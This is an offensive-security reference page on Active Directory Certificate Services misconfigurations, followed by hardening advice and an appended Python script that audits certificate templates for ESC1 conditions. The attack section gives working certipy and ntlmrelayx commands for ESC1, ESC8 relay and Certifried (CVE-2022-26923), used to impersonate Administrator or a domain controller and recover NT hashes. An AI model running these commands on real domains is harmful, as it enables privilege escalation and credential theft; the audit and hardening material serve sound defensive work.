ADCS
aka Active Directory Certificate Services, Certificate Authority
Active Directory Certificate Services. Misconfigured certificate templates (ESC1 to ESC16) let a low-privileged user enroll a certificate that authenticates as a privileged account.
Ports
| Port | Proto | Notes |
|---|---|---|
| 443 | tcp | web enrollment (certsrv), ESC8 relay target |
| 445 | tcp | RPC enrollment over SMB |
Fingerprint
- certipy find / certutil reveal the CA and templates
- A Certificate Authority object exists in AD (pKIEnrollmentService)
Key files
| Path | Holds | Sensitive |
|---|---|---|
| vulnerable certificate templates | enrollee-supplied subject or dangerous EKUs | sensitive |
| CA private key (on the CA host) | forge any certificate (golden cert) | sensitive |
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2022-26923 | Certifried, machine-account certificate to Domain Admin |
Exploitation primitives
- certipy find -vulnerable enumerates ESC1 to ESC16 misconfigurations
- ESC1: template allows enrollee-supplied subject, request a cert as Administrator and authenticate (PKINIT)
- ESC8: NTLM-relay a machine account to the web-enrollment endpoint
- ESC16 and others: request, then auth with the cert to recover the target NT hash, no password reset needed
Overview
ADCS issues certificates inside the domain. When a template is misconfigured, a normal user can request a certificate that proves they are someone far more privileged, then use it to authenticate and pull that account’s hash.
Enumeration
certipy find -u user@dom.local -p pass -dc-ip <TARGET> -vulnerable -stdout
ESC1 example
Request a certificate as Administrator:
certipy req -u user@dom.local -p pass -ca <CA> -template <tmpl> -upn administrator@dom.local
Authenticate with it to recover a TGT and the NT hash:
certipy auth -pfx administrator.pfx -dc-ip <TARGET>
ESC8 — NTLM relay to web enrollment
Start the relay against the CA’s enrollment endpoint:
ntlmrelayx.py -t http://<CA>/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Coerce a DC to authenticate (PetitPotam / printerbug), catch the cert, then certipy auth it for the DC’s TGT.
Certifried (CVE-2022-26923)
Create a machine account, set its dNSHostName to a DC, request a cert, and authenticate as the DC:
certipy account create -u user@dom.local -p pass -dc-ip <TARGET> -user 'evilpc' -dns dc.dom.local
certipy req -u 'evilpc$' -p pass -ca <CA> -template Machine
Hardening
Remove enrollee-supplied-subject on auth templates, restrict enrollment rights, enable the ESC8 mitigations (EPA / require signing), and audit template ACLs.
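The audit step above, worked as code: an added example (not certipy's code and not from this page) that checks template records for the ESC1 preconditions the page names (enrollee-supplied subject, an authentication EKU, broad enrollment rights, no approval gate) and shows what the hardened template looks like. The template records are constructed; the attribute names and flag values are the real MS-CRTD ones, but the enrollment principals are assumed to have already been resolved from the template's security descriptor to group names.

```python
"""Audit AD CS certificate templates for ESC1 preconditions.

Added example, not certipy's code. The SAMPLE_TEMPLATES records are
constructed to mimic the MS-CRTD attributes that certipy/certutil read
from CN=Certificate Templates,CN=Public Key Services in AD; a real
audit would fill Template from LDAP instead.
"""
from dataclasses import dataclass, replace

# Real MS-CRTD flag values
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # bit in msPKI-Enrollment-Flag (manager approval)

# EKU OIDs that let the issued certificate be used for logon (PKINIT / Schannel)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Assumption: enrollment ACEs were already resolved from SIDs to these group names.
BROAD_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


@dataclass(frozen=True)
class Template:
    name: str
    name_flag: int                   # msPKI-Certificate-Name-Flag
    enrollment_flag: int             # msPKI-Enrollment-Flag
    ra_signatures: int               # msPKI-RA-Signature
    ekus: frozenset[str]             # pKIExtendedKeyUsage; empty means no EKU restriction
    enroll_principals: frozenset[str]  # principals holding Enroll/AutoEnroll


def esc1_findings(t: Template) -> list[str]:
    """Return the reasons a template satisfies every ESC1 precondition, or [] if any is missing."""
    if not t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        return []                                   # subject comes from AD, requester cannot pick it
    if t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        return []                                   # a CA manager must approve each request
    if t.ra_signatures > 0:
        return []                                   # an enrollment agent signature is required
    if t.ekus and not (t.ekus & AUTH_EKUS):
        return []                                   # certificate cannot be used for logon
    broad = t.enroll_principals & BROAD_PRINCIPALS
    if not broad:
        return []                                   # only specific principals may enroll
    return [
        "enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)",
        "no manager approval and no RA signatures required",
        "EKU permits authentication" if t.ekus else "no EKU restriction (any purpose)",
        "enrollment granted to " + ", ".join(sorted(broad)),
    ]


def audit(templates: list[Template]) -> dict[str, list[str]]:
    """Map each ESC1-vulnerable template name to the reasons it was flagged."""
    return {t.name: r for t in templates if (r := esc1_findings(t))}


def harden(t: Template) -> Template:
    """Apply the page's hardening advice: clear the subject flag and drop broad enrollment rights."""
    return replace(
        t,
        name_flag=t.name_flag & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        enroll_principals=t.enroll_principals - BROAD_PRINCIPALS,
    )


# Constructed sample templates (not real data); only the first should be flagged.
SAMPLE_TEMPLATES = [
    Template("UserAuthVuln", 0x1, 0x0, 0, frozenset({"1.3.6.1.5.5.7.3.2"}), frozenset({"Domain Users"})),
    Template("WebServer", 0x1, 0x0, 0, frozenset({"1.3.6.1.5.5.7.3.1"}), frozenset({"Domain Users"})),  # server-auth EKU only
    Template("ApprovedAdminAuth", 0x1, 0x2, 0, frozenset({"1.3.6.1.5.5.7.3.2"}), frozenset({"Domain Users"})),  # manager approval
    Template("User", 0x0, 0x0, 0, frozenset({"1.3.6.1.5.5.7.3.2"}), frozenset({"Domain Users"})),  # subject built from AD
    Template("CAAdminOnly", 0x1, 0x0, 0, frozenset(), frozenset({"PKI Admins"})),  # any-purpose but restricted enrollment
]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_TEMPLATES).items():
        print(f"[ESC1] {name}: " + "; ".join(reasons))
    print("after hardening:", audit([harden(t) for t in SAMPLE_TEMPLATES]) or "no ESC1 findings")
```

Either change in `harden` alone is enough to close ESC1 on the sample template; in practice do both, since an ACL edit is easy to regress while the subject flag change forces the CA to build the subject from AD.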